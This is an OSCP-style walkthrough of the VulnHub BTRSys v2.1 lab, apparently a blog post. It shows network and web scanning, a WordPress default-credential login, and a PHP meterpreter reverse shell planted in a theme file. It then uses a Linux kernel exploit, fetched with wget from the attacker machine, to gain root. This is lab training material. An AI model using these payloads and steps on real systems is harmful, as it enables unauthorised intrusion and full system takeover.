• OSCP Learning Notes


    BTRSys v2.1 Walkthrough

    Preparation:

    Download the BTRSys virtual machine from the following website:

    https://www.vulnhub.com/entry/btrsys-v21,196/

    1. Find the IP address of the BTRSys virtual machine.

    netdiscover -r 10.0.0.0/24

    2. Perform the TCP/UDP scan using Nmap to find the potential vulnerabilities.

    nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/Delete/tcp1.txt 10.0.0.29

    nmap -nvv -Pn- -sSV -p 21,22,80 --version-intensity 9 -A -oN /root/Delete/tcp2.txt 10.0.0.29

    nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/Delete/udp.txt 10.0.0.29

    3. Browse the target website(http://10.0.0.29) through Firefox.

    4. Try to scan the file structure of the target server using the tool Nikto.

    nikto -h 10.0.0.29

    Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

    Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

    Try to login in the WordPress using default username/password(admin/admin).

     Ahaaa! Login in the admin page successfully.

     Go to the Edit Themes page.

    5. List all the payload in Kali Linux

    msfvenom -l payload

    Set the payload module and parameters.

    msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.0.26 lport=4444 -f raw

    Copy, Paste and upload the generated PHP exploit code to the Wordpress website.

    6. Start the Metasploit on the Kali Linux and choose the proper module. Then set the payload module and parameters.

    use exploit/multi/handler
    
    set payload php/meterpreter/reverse_tcp
    
    set lhost 10.0.0.26

    Browse the edited page(http://10.0.0.29/wordpress/wp-content/themes/twentyfourteen/404.php) through Firefox.

    So the communication between Kali Linux and BTRSys is established.

    Execute the command help to find the commands we can grab.

    Core Commands
    =============
    
        Command                   Description
        -------                   -----------
        ?                         Help menu
        background                Backgrounds the current session
        bg                        Alias for background
        bgkill                    Kills a background meterpreter script
        bglist                    Lists running background scripts
        bgrun                     Executes a meterpreter script as a background thread
        channel                   Displays information or control active channels
        close                     Closes a channel
        disable_unicode_encoding  Disables encoding of unicode strings
        enable_unicode_encoding   Enables encoding of unicode strings
        exit                      Terminate the meterpreter session
        get_timeouts              Get the current session timeout values
        guid                      Get the session GUID
        help                      Help menu
        info                      Displays information about a Post module
        irb                       Open an interactive Ruby shell on the current session
        load                      Load one or more meterpreter extensions
        machine_id                Get the MSF ID of the machine attached to the session
        migrate                   Migrate the server to another process
        pry                       Open the Pry debugger on the current session
        quit                      Terminate the meterpreter session
        read                      Reads data from a channel
        resource                  Run the commands stored in a file
        run                       Executes a meterpreter script or Post module
        secure                    (Re)Negotiate TLV packet encryption on the session
        sessions                  Quickly switch to another session
        set_timeouts              Set the current session timeout values
        sleep                     Force Meterpreter to go quiet, then re-establish session.
        transport                 Change the current transport mechanism
        use                       Deprecated alias for "load"
        uuid                      Get the UUID for the current session
        write                     Writes data to a channel
    
    
    Stdapi: File system Commands
    ============================
    
        Command       Description
        -------       -----------
        cat           Read the contents of a file to the screen
        cd            Change directory
        checksum      Retrieve the checksum of a file
        chmod         Change the permissions of a file
        cp            Copy source to destination
        dir           List files (alias for ls)
        download      Download a file or directory
        edit          Edit a file
        getlwd        Print local working directory
        getwd         Print working directory
        lcd           Change local working directory
        lls           List local files
        lpwd          Print local working directory
        ls            List files
        mkdir         Make directory
        mv            Move source to destination
        pwd           Print working directory
        rm            Delete the specified file
        rmdir         Remove directory
        search        Search for files
        upload        Upload a file or directory
    
    
    Stdapi: Networking Commands
    ===========================
    
        Command       Description
        -------       -----------
        portfwd       Forward a local port to a remote service
    
    
    Stdapi: System Commands
    =======================
    
        Command       Description
        -------       -----------
        execute       Execute a command
        getenv        Get one or more environment variable values
        getpid        Get the current process identifier
        getuid        Get the user that the server is running as
        kill          Terminate a process
        localtime     Displays the target system's local date and time
        pgrep         Filter processes by name
        pkill         Terminate processes by name
        ps            List running processes
        shell         Drop into a system command shell
        sysinfo       Gets information about the remote system, such as OS
    
    
    Stdapi: Audio Output Commands
    =============================
    
        Command       Description
        -------       -----------
        play          play an audio file on target system, nothing written on disk

     Find the Kernel version and current username of the BTRSys server.

    sysinfo
    
    getuid

    7. Try to find the vulnerabilities related to Linux ubuntu 4.4.0-62-generic in the Exploit Database. Then  download and copy the exploit code file to the folder /var/www/html.

    https://www.exploit-db.com/exploits/41458

    Compile the source code and download the executable file to BTRSys server.

    gcc -o exploit 41458.c

     

    wget http://10.0.0.26/exploit

     Ahaaa! We get the root privilege by executing the exploit file.

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    CFS 调度器
    RCU
    linux cfs 负载均衡
    wait_event_interruptible_timeout
    算法(13)Contiguous Array
    算法(12)Pascal's Triangle II
    算法(12)Best Time to Buy and Sell Stock II
    算法(11)Find All Duplicates in an Array
    算法(10)Subarray Sum Equals K
    算法(9)Find the Duplicate Number
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11297750.html
Copyright © 2020-2023  润新知